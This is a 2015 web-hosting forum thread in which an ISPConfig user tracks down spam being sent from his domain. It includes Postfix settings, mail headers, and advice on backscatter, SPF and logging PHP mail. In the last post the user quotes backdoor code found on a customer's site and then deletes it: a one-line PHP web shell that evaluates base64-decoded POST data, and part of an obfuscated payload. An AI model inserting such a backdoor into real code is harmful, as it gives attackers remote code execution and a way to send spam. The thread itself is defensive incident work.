Sending spam and no logs.

Discussion in 'Installation/Configuration' started by timontomi, Jan 12, 2015.

  1. timontomi

    timontomi New Member

    Hello,

    i have problem with sending spam.
    Everyday i received info in style "Undelivered Mail Returned to Sender".

    "Return" emails are from external mail servers. In "return email" i received .eml file, where i can find info, that sender is f.e. [email protected] where "agnes_boyd" is not my username, but mydomain.com = is my correct and actuall domain.
    Code:
    
    
    Return-Path: <[email protected]>
    
    Received: from mydomain.com (hosting.mydomain.com [my.ip.address])
    
    by a2-selva6.bol.com.br (Postfix) with ESMTP id 3kLZbX1hP2zKLbDY
    
    for <[email protected]>; Mon, 12 Jan 2015 10:53:26 -0200 (BRST)
    Please help me, what can be wrong.
    In log i don't see sending emails, i only receive not deliver emails or bounced emails (after send) from external mail servers.

    main.cf looks ok, below part of main.cf
    Code:
    smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_non_fqdn_helo_hostname, reject_invalid_helo_hostname, reject_unknown_helo_hostname
    
    smtpd_delay_reject = yes
    
    smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, reject_unknown_sender_domain, reject_non_fqdn_recipient,check_recipient_access mysql:/etc/postfix/mysql-virtual_recipient.cf, reject_unknown_recipient_domain, check_policy_service inet:127.0.0.1:10023, reject_rbl_client xbl.spamhaus.org, reject_rbl_client bl.spamcop.net
    
    mtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_non_fqdn_helo_hostname, reject_invalid_helo_hostname, reject_unknown_helo_hostname
    
    smtpd_delay_reject = yes
    
    smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, reject_unknown_sender_domain, reject_non_fqdn_recipient,check_recipient_access mysql:/etc/postfix/mysql-virtumtpd_tls_security_level = may
    
    transport_maps = hash:/var/lib/mailman/data/transport-mailman, proxy:mysql:/etc/postfix/mysql-virtual_transports.cf
    
    relay_domains = mysql:/etc/postfix/mysql-virtual_relaydomains.cf
    
    relay_recipient_maps = mysql:/etc/postfix/mysql-virtual_relayrecipientmaps.cf
    
    proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
    
    smtpd_client_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unknown_client_hostname, check_client_access mysql:/etc/postfix/mysql-virtual_client.cf, reject_rbl_client cbl.abuseat.org
    On ISPConfig i have few domains, and only for one i have this problems.
    From another domains i have no emails in this style.
     
    Last edited: Jan 12, 2015
  2. timontomi

    timontomi New Member

  3. till

    till Super Moderator Staff Member ISPConfig Developer

  4. timontomi

    timontomi New Member

    But undeliverable emails, which i received, have source like below with use my IP and my domain :/
    "lula_holmes" is next non-exist mailbox.

    Code:
    Received: from na01-bl2-obe.outbound.protection.outlook.com (207.46.163.207)
    by CIO-KRC-HT01.osuad.osu.edu (164.107.81.37) with Microsoft SMTP Server
    (TLS) id 14.3.174.1; Thu, 15 Jan 2015 00:23:16 -0500
    Received: from BY2FFO11FD027.protection.gbl (10.1.14.31) by
    BY2FFO11HUB036.protection.gbl (10.1.14.179) with Microsoft SMTP Server (TLS)
    id 15.1.49.13; Thu, 15 Jan 2015 05:23:14 +0000
    Received: from MYDOMAIN.COM (MY SRV IP) by
    BY2FFO11FD027.mail.protection.outlook.com (10.1.15.216) with Microsoft SMTP
    Server id 15.1.59.14 via Frontend Transport; Thu, 15 Jan 2015 05:23:13 +0000
    Date: Thu, 15 Jan 2015 06:23:11 +0100
    From: Lula Holmes [EMAIL][email protected][/EMAIL]
    Reply-To: Lula Holmes [EMAIL][email protected][/EMAIL]
    Message-ID: [EMAIL][email protected][/EMAIL]
    To: <[email protected]>
    Subject: Fw:  Elena Grimaldi - Anal Threesome MMF
    
     
  5. cbj4074

    cbj4074 Member

    LOL, I love the subject at the bottom of the snippet.

    As Till said, nothing you have stated or provided so far indicates that these emails are in fact being sent from your server.

    Just because you receive an email message with "Undelivered Mail Returned to Sender", it does not mean that your server sent the original message. As Till suggested, it would be trivial to forge these messages.

    This is a common spamming technique known as "back-scatter". See: http://its.fsu.edu/Email/Spam-Virus-Email-Filtering/Spoofing-backscatter

    I recommend that you implement appropriate spam-filtering mechanisms on the server in question, namely, clamav, Amavis, and SpamAssassin. And, ideally, postgrey and SPF-checking.
     
  6. timontomi

    timontomi New Member

    Hi,

    Thanks for answers.

    I already implement amavis and postgrey on the server and messages still come.

    So it's normally then my srv sometimes is on blacklist because of this spam messages - once per month ?
     
  7. cbj4074

    cbj4074 Member

    And what about SpamAssassin and SPF-checking?

    Also, your server shouldn't be blacklisted because of this. You are receiving these bogus emails, not sending them. Correct?
     
  8. timontomi

    timontomi New Member

    Correct, because i don't see these emails in mail log. If i send from my account email -> i see this in mail log.
    SpamAssassin -> incoming email headers are with ***SPAM*** or bounced.

    Today i received email:
    Code:
    Received-SPF: Fail (protection.outlook.com: domain of MYDOMAIN does
    not designate 207.46.163.185 as permitted sender)
    So SPF checking works.

    But for some emails i have:
    Code:
    Received: from BLUPR08CA0042.namprd08.prod.outlook.com (10.141.200.22) by
    BL2PR08MB065.namprd08.prod.outlook.com (10.242.196.12) with Microsoft SMTP
    Server (TLS) id 15.1.59.20; Mon, 19 Jan 2015 12:50:49 +0000
    Received: from BY2FFO11FD004.protection.gbl (2a01:111:f400:7c0c::156) by
    BLUPR08CA0042.outlook.office365.com (2a01:111:e400:88d::22) with Microsoft
    SMTP Server (TLS) id 15.1.59.20 via Frontend Transport; Mon, 19 Jan 2015
    12:50:49 +0000
    Received: from MYDOMAIN (MY IP) by
    BY2FFO11FD004.mail.protection.outlook.com (10.1.14.158) with Microsoft SMTP
    Server id 15.1.75.11 via Frontend Transport; Mon, 19 Jan 2015 12:50:48 +0000
    Date: Mon, 19 Jan 2015 13:50:47 +0100
    From: Stacie Mcbride <[email protected]>
    Reply-To: "Stacie Mcbride" <[email protected]>
    Message-ID: <[email protected]>
    To: <[email protected]>
    Subject: FW: Hi, A daily updated list showing a variety of free blowjob picture and
    movie galleries
    X-Priority: 3 (Normal)
    MIME-Version: 1.0
    Content-Type: text/html; charset="iso-8859-1"
    Content-Transfer-Encoding: 8bit
    Return-Path: [email protected]
    X-EOPAttributedMessage: 0
    Received-SPF: Pass (protection.outlook.com: domain of MYDOMAIN
    designates MY IP as permitted sender)
    receiver=protection.outlook.com; client-ip=MY IP;
    helo=MY DOMAIN;
    Authentication-Results: spf=pass (sender IP is MY IP)
    [email protected] DOMAIN; und.nodak.edu; dkim=none
    (message not signed) header.d=none;und.nodak.edu; dmarc=permerror action=none
    header.from=MY DOMAIN;
    So it looks like these emails can be from my srv but not in logs ? :/
     
  9. cbj4074

    cbj4074 Member

    Okay, good to see that SpamAssassin flags the forged bounce messages as spam, and that SPF-checking seems to work.

    Given the rest of what you said, perhaps you have a compromised PHP script or similar that is allowing somebody to send mail from your server. I see this problem with compromised WordPress installations all the time.

    If a PHP script is responsible for sending the mail, it is possible that you will not have much (if any) evidence in your Postfix logs.

    Two things I would do immediately:

    1.) Modify your PHP configuration such that all mail activity is logged.

    2.) Modify your PHP configuration such that the user under which the PHP process is running when mail is sent is included in the message headers.

    If these messages really are being sent from your server, these two measures will help immensely in tracking-down the source.

    While I have not implemented it myself, this subject is discussed at length in https://www.howtoforge.com/how-to-log-emails-sent-with-phps-mail-function-to-detect-form-spam , which is probably worth a read.

    Curious to see what you find...
     
  10. timontomi

    timontomi New Member

  11. till

    till Super Moderator Staff Member ISPConfig Developer

    Thats correct but in your case ist just complicates the problem, if the spammesr would use the mail functions, you would be able to identify the spam in mail.log and also see the sending script in the mail headers. But when the function is disabled, the spammers have to upload their own smtp library to send mail and thats not esy to detec as you wont get any logs in that case and even the log script wont show anything.

    What you ca try to find the sending script with lsof, but this will give only useful results when you catch it while it is currently sending.
     
  12. timontomi

    timontomi New Member

    Unfortunatelly via mail function, nothing in logs :/ (test email via test.php was in log, so log works correctly).
    But i think i solved problems.
    I check customers websites and in one log i found some errors in php sites.
    Deeper -> i found in .php which generate error lines:

    Code:
    eval(base64_decode($_POST['e']));
    Code:
    return base64_decode($vNS0QU3);}
    $v0O2K6T = '60dVYaTfKb3mXvSkdv2lKz1ETRCgR1ikPZPRh5fUO8qV9IhGLDoq9EqV9IqbYRxmwanYwDxZK'.
    'MPIwr5Vgt9EdtZuYOnYwDxZKMPI0E9ETt3AXag8tPn8dvCfdvn8tRx2wrxj'.
    'D8xVT03uXEi8dt3f34FkT0S4XvFfYa3fKMfCXzfQTRVZKMPIYRZjDb5YDM3ndt3Iw133P1xVJquVwaiAdMpmdExZh5Ahh12gOA9h'.
    'wr5VL4hjD8xVKaP8Xzf4wDFrhZpzwr5VwfpEtzo8equVwaiAdMpmdExZTz2kTzP8W0KVURxqequVwaiAdM'.
    'pmdExZFzP8W0W7WtFqWtgVwDxVwr5V9vP46zcbequVwaiAdMpmdExZTz2kWMPEKDx2wzTCXa3f'.
    'equVwaiAdMpmdExZPzflT02AWDxVwDxVwDxVwr5VLOhjD8xVKaP8Xzf4wDFh60AfXzfl6tgVwDxVwDxVURx'.
    'ILrnYwDiqW09n60LV91TfKb3mXvoVwDxVwDxVwDx2wDKAs4wG38KjD8xVKa'.
    '97WzP4WzPZwDFIXtFqtv37XMojD8xVKa97WzP4WzPZwDFfKb97K4'.
    'nYwDiqKM25T035T0gV9zCfXz2kKbinJOnYwDiqKM25T035T0gVTbPGdHFmXvoVT0FfdbPbYDFIWawm'.
    'wanYwDxVwa3H6tF46Dxu9aFu6tLlUZFfdbPbXHP5KaP5YRijD8xVwDxVwz3CKvhV9vPEKM2Etvp7TE'.
    etc etc etc. with 1510 lines.

    I delete these .php files and problem with spam gone.
    From yesterday no "undeliverable" emails :)
     

Share This Page